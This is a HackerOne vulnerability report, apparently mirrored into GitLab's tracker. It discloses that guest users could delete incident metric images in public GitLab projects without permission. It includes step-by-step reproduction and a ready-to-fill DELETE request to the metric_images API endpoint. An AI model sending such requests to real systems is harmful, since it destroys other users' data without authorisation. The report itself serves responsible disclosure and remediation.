**[HackerOne report #1107281](https://hackerone.com/reports/1107281)** by `ashish_r_padelkar` on 2021-02-19, assigned to @ngeorge1: [Report](#report) | [How To Reproduce](#how-to-reproduce) ## Report ##### Summary Hello, It is possible to delete all metrics images from incidents for non members of the public projects without any permissions. When you browse to any incident metrics images , you wont see delete option for metrics images. However, It is possible for any guest user to delete these metric images using this vulnerability! ### Pre-requisites. Metrics images are only available on issue of `Incident` types. You need to create issue with type as `Incident` ##### Steps to reproduce 1. Login as guest user and go to any public project Incident metrics image. For eg, `https://gitlab.com/<NameSpace>/<ProjectName>/-/issues/<ID>` and click on `Metrics` tab!. 2. You wont see `Delete` option because you dont have any permission to delete this image. 3. Just form a request like below. ``` DELETE /api/v4/projects/[REDACTED]/issues/5/metric_images/44 HTTP/1.1 Host: gitlab.com Connection: close Accept: application/json, text/plain, */* X-CSRF-Token: <Replace_your_csrf_Token> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 X-Requested-With: XMLHttpRequest Origin: https://gitlab.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://gitlab.com/gitlabadminuser/mvn-example/-/issues/2 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9 Cookie: <Replace_Your_Cookies> ``` You need to supply Project ID, Issue ID and Metrics image ID in above request. In above eg, `23887195` is the project ID, `5` is the issue ID and `44` is the Metric image ID. 4.This will delete the metric image from issue although you dont have access to do so! 5. This way, you can delete all the public metrics images even if you dont have any access to the project! ##### What is the current *bug* behavior? Non members can delete all the public metrics images without permissions! ##### What is the expected *correct* behavior? Only reporters(or developer) should be able to delete the metrics images within their own projects. ##### Output of checks This bug happens on GitLab.com Regards, Ashish #### Impact Any gitlab user can potentially delete all the public metric images from incidents without permission ## How To Reproduce Please add [reproducibility information] to this section: 1. 1. 1. [reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues